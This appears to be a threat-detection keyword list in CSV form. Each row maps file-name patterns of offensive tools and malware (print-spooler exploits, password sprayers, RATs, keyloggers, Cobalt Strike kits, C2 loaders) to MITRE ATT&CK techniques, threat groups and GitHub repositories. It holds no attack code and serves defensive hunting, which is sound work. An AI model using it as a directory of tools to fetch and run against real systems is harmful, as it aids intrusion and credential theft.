"*\spoofIPs_client.py*",".{0,1000}\\spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19050"
"*\spooler.py*",".{0,1000}\\spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19052"
"*\SpoolFool.exe*",".{0,1000}\\SpoolFool\.exe.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19053"
"*\SpoolFool.ps1*",".{0,1000}\\SpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19054"
"*\SpoolFool.sln*",".{0,1000}\\SpoolFool\.sln.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19055"
"*\SpoolFool-main*",".{0,1000}\\SpoolFool\-main.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","19056"
"*\SpoolTrigger.x64.dll*",".{0,1000}\\SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19057"
"*\SpoolTrigger.x86.dll*",".{0,1000}\\SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19058"
"*\SPR by Mizore.exe*",".{0,1000}\\SPR\sby\sMizore\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19059"
"*\SprayAD.cna*",".{0,1000}\\SprayAD\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","19060"
"*\SprayAD.exe*",".{0,1000}\\SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","19061"
"*\spraycharles.py*",".{0,1000}\\spraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","19062"
"*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19063"
"*\sprayed-creds.txt*",".{0,1000}\\sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","19064"
"*\SprayLove.py",".{0,1000}\\SprayLove\.py","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","19065"
"*\spray-results.txt*",".{0,1000}\\spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","19066"
"*\SpyGate-RAT *.exe*",".{0,1000}\\SpyGate\-RAT\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19067"
"*\Spyndicapped.exe*",".{0,1000}\\Spyndicapped\.exe.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19068"
"*\Spyndicapped_dev\*",".{0,1000}\\Spyndicapped_dev\\.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#content","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19069"
"*\Spyndicapped-main*",".{0,1000}\\Spyndicapped\-main.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","19070"
"*\SpyNet.exe*",".{0,1000}\\SpyNet\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19071"
"*\Spy-Net.exe*",".{0,1000}\\Spy\-Net\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19072"
"*\SpyNote.exe*",".{0,1000}\\SpyNote\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19073"
"*\SpySytem RAT.exe*",".{0,1000}\\SpySytem\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19074"
"*\SQLC2.ps1*",".{0,1000}\\SQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19075"
"*\SQLC2CMDS.dll*",".{0,1000}\\SQLC2CMDS\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19076"
"*\SQLInfoDumps*",".{0,1000}\\SQLInfoDumps.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","19077"
"*\SQLRecon*",".{0,1000}\\SQLRecon.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","Black Basta","Exploitation tool","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","9","8","719","120","2025-01-10T17:42:49Z","2021-11-19T15:58:49Z","19078"
"*\src\check\Credentials.ps1*",".{0,1000}\\src\\check\\Credentials\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","19079"
"*\src\KaynInject.c*",".{0,1000}\\src\\KaynInject\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","19080"
"*\src\KaynLdr.c*",".{0,1000}\\src\\KaynLdr\.c.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","19081"
"*\src\KaynStrike.c*",".{0,1000}\\src\\KaynStrike\.c.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","19082"
"*\src\links\windows\src\evasion.rs*",".{0,1000}\\src\\links\\windows\\src\\evasion\.rs.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","19083"
"*\Src\Recon-AD-Groups\*",".{0,1000}\\Src\\Recon\-AD\-Groups\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","19084"
"*\Src\Recon-AD-Users\*",".{0,1000}\\Src\\Recon\-AD\-Users\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","19085"
"*\SSH R.A.T.exe*",".{0,1000}\\SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19088"
"*\SSH R.A.T.exe*",".{0,1000}\\SSH\sR\.A\.T\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19089"
"*\SSH_Keylogger_Stub.exe*",".{0,1000}\\SSH_Keylogger_Stub\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19090"
"*\Sst-Sheller.php*",".{0,1000}\\Sst\-Sheller\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19093"
"*\stageless.vba*",".{0,1000}\\stageless\.vba.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19094"
"*\stageless.vbs*",".{0,1000}\\stageless\.vbs.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19095"
"*\stagelessv4.vba*",".{0,1000}\\stagelessv4\.vba.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19096"
"*\stagelessv4.vbs*",".{0,1000}\\stagelessv4\.vbs.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","19097"
"*\stager.ps1*",".{0,1000}\\stager\.ps1.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","19098"
"*\StandIn --*",".{0,1000}\\StandIn\s\-\-.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19099"
"*\StandIn.exe*",".{0,1000}\\StandIn\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19100"
"*\StandIn.pdb*",".{0,1000}\\StandIn\.pdb.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19101"
"*\StandIn\hStandIn.cs*",".{0,1000}\\StandIn\\hStandIn\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19102"
"*\StandIn\Program.cs*",".{0,1000}\\StandIn\\Program\.cs.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19103"
"*\StandIn_Net35.exe*",".{0,1000}\\StandIn_Net35\.exe.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19104"
"*\StandIn_Net45.exe *",".{0,1000}\\StandIn_Net45\.exe\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19105"
"*\StandIn-1.3.zip*",".{0,1000}\\StandIn\-1\.3\.zip.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","19106"
"*\stardust.x64.bin*",".{0,1000}\\stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19107"
"*\stardust.x64.exe*",".{0,1000}\\stardust\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19108"
"*\Stardust\scripts\loader.x64.exe*",".{0,1000}\\Stardust\\scripts\\loader\.x64\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","19109"
"*\Start Menu\Programs\Startup\svchost.exe*",".{0,1000}\\Start\sMenu\\Programs\\Startup\\svchost\.exe.{0,1000}","offensive_tool_keyword","_","known executable in strange location - used by multiple malwares","T1037 - T1059 - T1547","TA0003 - TA0005?","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19123"
"*\start_campaign.py*",".{0,1000}\\start_campaign\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","19124"
"*\StayKit.cna*",".{0,1000}\\StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 